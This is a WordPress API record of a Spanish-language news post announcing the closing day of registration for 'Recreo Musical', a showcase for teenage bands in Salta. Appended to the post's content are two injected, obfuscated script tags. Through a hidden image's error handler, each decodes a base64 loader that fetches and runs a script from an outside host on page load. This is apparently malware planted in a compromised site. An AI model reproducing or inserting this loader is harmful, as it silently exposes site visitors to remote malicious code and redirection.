{"id":4268,"date":"2024-08-08T11:22:48","date_gmt":"2024-08-08T14:22:48","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4268"},"modified":"2025-08-13T23:51:19","modified_gmt":"2025-08-14T02:51:19","slug":"finaliza-hoy-la-convocatoria-recreo-musical-en-la-usina-cultural","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4268","title":{"rendered":"Finaliza hoy la convocatoria Recreo Musical en la Usina Cultural"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-4946f92e4fede69ae9a69d0070baface\" style=\"background-color:#690137\"><em>Dirigido a bandas de adolescentes de entre 14 y 18 a\u00f1o busca fomentar la participaci\u00f3n cultural. Las inscripciones estar\u00e1n abiertas hasta hoy 8 de agosto.<\/em><\/h3>\n\n\n\n<p>La Usina Cultural, a trav\u00e9s de la&nbsp;<strong>Secretar\u00eda de Cultura<\/strong>&nbsp;del Ministerio de Educaci\u00f3n, Cultura, Ciencia y Tecnolog\u00eda, extendi\u00f3, hasta hoy 8 de agosto, la convocatoria para su innovador certamen \u00abRecreo Musical\u00bb.<\/p>\n\n\n\n<p>Dirigido a bandas de adolescentes de entre 14 y 18 a\u00f1os, \u00abRecreo Musical\u00bb busca fomentar la participaci\u00f3n cultural sin la presi\u00f3n de competir por un primer lugar. Los participantes deben presentar al menos una canci\u00f3n original y tendr\u00e1n la oportunidad de actuar en vivo con soporte t\u00e9cnico completo en las instalaciones al aire libre de la Usina Cultural. Un jurado de expertos evaluar\u00e1 las propuestas por su originalidad y calidad art\u00edstica.<\/p>\n\n\n\n<p>\u00abRecreo Musical\u00bb no busca determinar un ganador, sino ofrecer un espacio p\u00fablico y abierto donde los j\u00f3venes puedan visibilizar sus expresiones musicales y compartir sus historias y las de sus comunidades. Cada grupo deber\u00e1 presentar al menos una canci\u00f3n de autor\u00eda propia durante el encuentro.<\/p>\n\n\n\n<p>Las bandas seleccionadas tendr\u00e1n la oportunidad de realizar un show en vivo en las instalaciones al aire libre de la Usina Cultural. Para estos eventos, se proporcionar\u00e1 toda la infraestructura t\u00e9cnica necesaria, incluyendo sonido, luces y camarines.<\/p>\n\n\n\n<p>Los criterios de selecci\u00f3n estar\u00e1n a cargo de un jurado compuesto por referentes del sector musical, quienes evaluar\u00e1n los proyectos bas\u00e1ndose en su originalidad, autenticidad, y calidad art\u00edstica.<\/p>\n\n\n\n<p>Este proyecto es una excelente oportunidad para que los j\u00f3venes talentos de Salta se den a conocer y se desarrollen en el \u00e1mbito musical. Invitamos a todos los j\u00f3venes m\u00fasicos a inscribirse y participar en esta enriquecedora experiencia.<\/p>\n\n\n\n<p>Para m\u00e1s informaci\u00f3n:&nbsp;<a href=\"http:\/\/www.culturasalta.gob.ar%20\/\">www.culturasalta.gob.ar&nbsp;<\/a>.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Dirigido a bandas de adolescentes de entre 14 y 18 a\u00f1o busca fomentar la participaci\u00f3n cultural. Las inscripciones estar\u00e1n abiertas hasta hoy 8 de agosto. La Usina Cultural, a trav\u00e9s de la&nbsp;Secretar\u00eda de Cultura&nbsp;del Ministerio de Educaci\u00f3n, Cultura, Ciencia y Tecnolog\u00eda, extendi\u00f3, hasta hoy 8 de agosto, la convocatoria para su innovador certamen \u00abRecreo Musical\u00bb. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4269,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,13],"tags":[],"class_list":{"0":"post-4268","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4268"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4268"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4268\/revisions"}],"predecessor-version":[{"id":6720,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4268\/revisions\/6720"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4269"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4268"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4268"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4268"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}